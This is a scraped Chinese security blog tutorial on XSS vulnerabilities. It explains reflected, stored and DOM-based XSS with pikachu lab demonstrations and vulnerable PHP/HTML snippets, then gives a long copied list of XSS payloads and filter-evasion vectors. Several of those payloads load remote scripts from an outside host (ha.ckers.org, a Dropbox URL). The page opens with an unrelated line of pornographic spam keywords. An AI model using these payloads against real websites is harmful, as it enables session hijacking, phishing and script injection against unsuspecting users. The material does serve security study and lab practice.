国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞

2年前作者：網(wǎng)絡(luò)安全_Aini分類：Toy博客閱讀(30)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記，是我學(xué)習(xí)網(wǎng)安過程中用心寫的，可以點(diǎn)開以下鏈接獲取：

超詳細(xì)的網(wǎng)絡(luò)安全筆記

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

二，文件包含漏洞詳解

以pikachu靶場為例子進(jìn)行講解，pikachu靶場的搭建請參考以下博客；

【網(wǎng)路安全 --- pikachu靶場安裝】超詳細(xì)的pikachu靶場安裝教程（提供靶場代碼及工具）_網(wǎng)絡(luò)安全_Aini的博客-CSDN博客【網(wǎng)路安全 --- pikachu靶場安裝】超詳細(xì)的pikachu靶場安裝教程（提供靶場代碼及工具）https://blog.csdn.net/m0_67844671/article/details/133682360?spm=1001.2014.3001.5502

一，什么是XSS漏洞？

XSS全稱（Cross Site Scripting）跨站腳本攻擊，為了避免和CSS層疊樣式表名稱沖突，所以改為了XSS，是最常見的Web應(yīng)用程序安全漏洞之一，位于OWASP top 10 2013/2017年度分別為第s三名和第七名，XSS是指攻擊者在網(wǎng)頁中嵌入客戶端腳本，通常是JavaScript編寫的危險(xiǎn)代碼，當(dāng)用戶使用瀏覽器瀏覽網(wǎng)頁時(shí)，腳本就會(huì)在用戶的瀏覽器上執(zhí)行，從而達(dá)到攻擊者的目的

XSS攻擊最終目的是在網(wǎng)頁中嵌入客戶端惡意腳本代碼，最常用的攻擊代碼是javascript語言，但也會(huì)使用其它的腳本語言，例如：ActionScript、VBscript。而如今的互聯(lián)網(wǎng)客戶端腳本基本是基于Javascript,所以如果想要深入研究XSS，必須要精通Javascript。 ?

XSS漏洞圖解

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

二，XSS漏洞出現(xiàn)的原因

程序?qū)斎牒洼敵龅目刂撇粔驀?yán)格,導(dǎo)致惡意的攻擊的腳本輸入后,在輸出到前端時(shí)被瀏覽器當(dāng)作有效代碼解析執(zhí)行從而產(chǎn)生危害.

三，XSS的危害

1、首先對于那些半年沒有更新的小企業(yè)網(wǎng)站來說，發(fā)生XSS漏洞幾乎沒有什么用。一般在各類的社交平臺(tái)，郵件系統(tǒng)，開源流行的Web應(yīng)用，BBS，微博等場景中，造成的殺傷力卻十分強(qiáng)大。

2、劫持用戶cookie是最常見的跨站攻擊形式，通過在網(wǎng)頁中寫入并執(zhí)行腳本執(zhí)行文件（多數(shù)情況下是JavaScript腳本代碼），劫持用戶瀏覽器，將用戶當(dāng)前使用的sessionID信息發(fā)送至攻擊者控制的網(wǎng)站或服務(wù)器中。

3、"框架釣魚"。利用JS腳本的基本功能之一：操作網(wǎng)頁中的DOM樹結(jié)構(gòu)和內(nèi)容，在網(wǎng)頁中通過JS腳本，生成虛假的頁面，欺騙用戶執(zhí)行操作，而用戶所有的輸入內(nèi)容都會(huì)被發(fā)送到攻擊者的服務(wù)器上。

4、掛馬（水坑攻擊）

5、有局限性的鍵盤記錄

還有很多很多.........

四，XSS的分類

4-1 反射型（中低危）

交互的數(shù)據(jù)一般不會(huì)被存在在數(shù)據(jù)庫里面,只是簡單的把用戶輸入的數(shù)據(jù)反射給瀏覽器，一次性，所見即所得。

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

就比如下面這段代碼，服務(wù)端拿到name以后，原木原樣輸出到客戶端?

<?php
    $name = $_GET['name'];
    echo "Welcome $name<br>";
?>

比如我們在服務(wù)端新建一個(gè)xss.php,把上面的代碼復(fù)制粘貼進(jìn)去?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

瀏覽器訪問 ,需要一個(gè)參數(shù)為name,那我們傳遞一個(gè)name參數(shù)，值為隨便

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

這個(gè)代碼很明顯沒有數(shù)據(jù)庫注入漏洞，但是存在xss漏洞，因?yàn)檫@段代碼并沒有對用戶的參數(shù)數(shù)據(jù)進(jìn)行過濾處理。 ?

攻擊方法 '"><script>confirm(1)</script> ，其中 '"> 我們稱之為完成閉合符號(hào)，后面跟script標(biāo)簽來進(jìn)行攻擊，彈出了窗口表示我們的js代碼被執(zhí)行了。

輸入payload以后就回車發(fā)請求

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

我們看到這執(zhí)行了，說明存在xss漏洞，攻擊成功了，當(dāng)然了這只是簡單驗(yàn)證，通過js寫一個(gè)功能性代碼可以實(shí)現(xiàn)更多的事情?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

其實(shí)xss的代碼手段非常多，因?yàn)閯e人可能通過過濾等手段對script標(biāo)簽做了限制，那么你想攻擊的話，就要改變方式，所以攻擊代碼的寫法非常多。 ?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

?現(xiàn)在以pikachu靶場為例：

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

我輸入了aaa,發(fā)現(xiàn)頁面上顯示who is aaa,i dont't care .

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

我們輸入的信息能在頁面上打印，可能存在xss漏洞，用payload試一下??

 '"><script>confirm(1)</script>

我輸入了payload發(fā)現(xiàn)輸入不全，原來是前端做了長度限制，不過這個(gè)限制很好繞過的，直接在下面框框的地方把20改為200，可以直接改的?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全 ?改完以后回車，然后再把payload復(fù)制粘貼，然后點(diǎn)擊提交

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

看到攻擊成功了?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

對比一下正常輸出的p標(biāo)簽跟payload以后的p標(biāo)簽有什么區(qū)別？

正常輸出時(shí)的p標(biāo)簽

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

攻擊成功后的p標(biāo)簽?

payload 是??'"><script>confirm(1)</script>

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

原來就是通過插入script標(biāo)簽來注入惡意代碼的

4-2 持久性（高危）

持久性也叫存儲(chǔ)型XSS，交互的數(shù)據(jù)會(huì)被存在在數(shù)據(jù)庫里面,永久性存儲(chǔ),具有很強(qiáng)的穩(wěn)定性。

示例： '"><script>confirm(1)</script>

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全 ?確定以后頁面就剩下''>了，其余的當(dāng)script標(biāo)簽輸出在頁面了，而且整個(gè)payload已經(jīng)存出來數(shù)據(jù)庫了，每次一打開這個(gè)頁面都會(huì)從數(shù)據(jù)庫讀取數(shù)據(jù)，加載到頁面，每次都會(huì)受到攻擊【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

比如刷新一下頁面看看?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

說明，這個(gè)攻擊代碼存儲(chǔ)到了數(shù)據(jù)庫里面，每次刷新頁面的時(shí)候，都會(huì)加載這個(gè)數(shù)據(jù)，執(zhí)行這個(gè)js代碼，所以這種存儲(chǔ)型漏洞很嚴(yán)重。

我們看一下他的后臺(tái)代碼,發(fā)現(xiàn)我們輸入的payload到了后臺(tái)以后會(huì)存儲(chǔ)到數(shù)據(jù)庫中，當(dāng)我們每次打開這個(gè)頁面的時(shí)候會(huì)從數(shù)據(jù)庫讀取數(shù)據(jù)渲染頁面，從數(shù)據(jù)庫讀取的惡意代碼就執(zhí)行了。

if(array_key_exists("message",$_POST) && $_POST['message']!=null){
    $message=escape($link, $_POST['message']);
    $query="insert into message(content,time) values('$message',now())";
    $result=execute($link, $query);
    if(mysqli_affected_rows($link)!=1){
        $html.="<p>數(shù)據(jù)庫出現(xiàn)異常，提交失?。?lt;/p>";
    }
}

4-3 DOM型（中低危）

?通過前端的dom節(jié)點(diǎn)形成的XSS漏洞,如下面的代碼，沒有前后端交互，文本框輸入的內(nèi)容直接輸出到頁面

<!DOCTYPE html>
<html>
<head>
    <title>輸入框提交示例</title>
    <script>
        function submitForm() {
            var inputText = document.getElementById("inputText").value;
            var result = document.getElementById("result");

            if (inputText.trim() === "") {
                result.innerText = "不能提交空內(nèi)容";
            } else {
                result.innerText = inputText;
            }
        }
    </script>
</head>
<body>
    <h1>輸入框提交示例</h1>
    <input type="text" id="inputText">
    <button onclick="submitForm()">提交</button>
    <p id="result"></p>
</body>
</html>

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

，一般不與后臺(tái)服務(wù)器產(chǎn)生數(shù)據(jù)交互，屬于中低危漏洞了。

可能觸發(fā)DOM型XSS的js操作

document.referer
window.name
location
innerHTML
document.write

閉合標(biāo)簽： ?

' οnclick="alert(1111)" ?
' οnclick="alert('xss')">
'><img src="#" οnmοuseοver="alert('xss')">
<a href="'</a><script>alert(1);</script>">what do you see?</a>

示例： ?

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

當(dāng)我們輸入正常內(nèi)容發(fā)現(xiàn)，輸出到了a標(biāo)簽的href屬性里，我們就想辦法閉合href屬性

構(gòu)造payload如下 xxx" οnclick="alert(123)

執(zhí)行以后發(fā)現(xiàn)語法上沒問題，確實(shí)閉合了a標(biāo)簽，添加了一個(gè)onclick屬性，但是整體被轉(zhuǎn)義了，所以攻擊失敗

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

可以構(gòu)造payload? xx' οnclick="alert('123')">

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全 ?點(diǎn)擊以后確實(shí)看到效果了

現(xiàn)在看一看攻擊以后渲染的效果??xx' οnclick="alert('123')">

【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞,10大漏洞,網(wǎng)絡(luò)安全,xss,網(wǎng)絡(luò)安全,web安全

五，XSS常用payload?

下面是我找的比價(jià)全的xsspayload，來自以下博客，可以參考一下

XSS-Payload大全_xsspayload大全_gy1bubble的博客-CSDN博客文章來源地址http://www.zghlxwxcb.cn/news/detail-718496.html

<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=java:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo ;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:????????????????????????????????????????????????????????????(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">?????script??????javascript:alert(1)?????/script??????
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behA:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
<IMG SRC="jav ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" >
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
?????script??????alert(????XSS????)?????/script??????
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A >XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A >XSS</A>
<A >XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src=" javascript:prompt(1) ">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`` onerror=alert(1)
<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x: {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/  src=`~` onerror=prompt(1)>
<form><iframe  src="javascript:alert(1)" ;>
<a href="data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[]" onmouseover=prompt(1)//">XYZ</a
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style ><script :-(>/**/alert(document.location)/**/</script :-(
</form><input type="date" onfocus="alert(1)">
